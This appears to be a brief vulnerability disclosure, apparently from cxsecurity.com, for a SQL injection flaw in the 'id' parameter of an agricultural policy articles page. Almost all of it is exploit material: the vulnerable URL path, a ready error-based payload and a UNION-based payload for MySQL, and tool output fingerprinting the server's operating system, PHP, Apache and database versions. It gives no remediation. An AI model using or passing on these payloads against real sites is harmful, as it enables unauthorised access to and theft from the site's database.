FFTC Agricultural Policy Articles SQLi

2019.10.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Vulnerable path (Payload): /ap_situationer.php?id=1'%22&nid=99&type=view

Parameter: id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-1903' OR 1 GROUP BY CONCAT(0x7162717071,(SELECT (CASE WHEN (3403=3403) THEN 1 ELSE 0 END)),0x7176707671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&nid=99&type=view

    Type: UNION query
    Title: MySQL UNION query (random number) - 14 columns
    Payload: id=-5251' UNION ALL SELECT CONCAT(0x7162717071,0x735766496c4851644275597846796d4d79714150735a676c41596a67646d7a67637667656767514e,0x7176707671),1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108#&nid=99&type=view
---
[13:17:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL Unknown


Copyright 2019, cxsecurity.com